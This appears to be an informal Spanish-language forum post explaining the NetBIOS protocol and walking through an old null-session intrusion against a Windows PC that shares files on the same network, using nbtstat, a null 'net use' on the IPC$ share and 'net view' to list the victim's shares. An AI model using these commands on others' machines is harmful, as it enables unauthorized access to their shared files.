NetBIOS

¿NetBIOS?

¿qué es? ¿se come?

NETBIOS (Network Basic Output/Input System que en español Sistema Básico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores.

Es habitual oír hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 también forman parte de este protocolo,

y, por qué carajo os explico esto? pues porque puede convertirse también en una vulnerabilidad, mediante la cual un sujeto hábil (o alguien muy aburrido) puede entrar a tu PC.

la forma más usual de realizar este ataque es cuando se está en una misma red, nunca he probado a hacerlo mediante wifi, y no veo el problema para que "no se pueda" pero lo cierto es que esta vulnerabilidad fué reparada hace años (no entraré en detalles).

para poder ser blanco de este ataque, debes cumplir con lo siguiente:

1.-Estar conectado

2.-Compartir archivos

el método de ataque es el siguiente> Abrir Inicio>ejecutar>CMD

usas W7 ? a la mierda, habre un bloc de notas y escribe "start CMD" (sin las comillas) luego lo guardas como hola.bat (debe de tener esa extension)

nbtstat -A IP_AQUÍ || Donde IP_AQUÍ es la IP local del equipo a atacar. (si hay gente en tu red, puedes ver sus IPs locales entrando al router, entre muchas formas...)

puede darte muchos resultados, el peor de todos (y el más común) es este

Host not found.

Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si escribiste bien la IP)

-----------------------------------------

si sale algo como esto

NetBIOS Remote Machine Name Table

Name Type Status

----------------------------------------------------------------

NAME UNIQUE Registered

WORKGROUP GROUP Registered

NAME UNIQUE Registered

NAME UNIQUE Registered

WORKGROUP GROUP Registered

estamos bien, luego haz esto

net use \\[ip_de_la_víctima]\ipc$ "" /user:""


Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET

C:\>net view \\192.168.0.1

eso es básicamente, una manera mediante la cual un atacante remoto puede entrar a tu PC, se que está muy mal explicado, y sin imágenes, pero en estos tiempos no vale mucho la pena, posiblemente incluya en el tutorial que estoy haciendo, algo detallado sobre intrusiones NetBIOS :)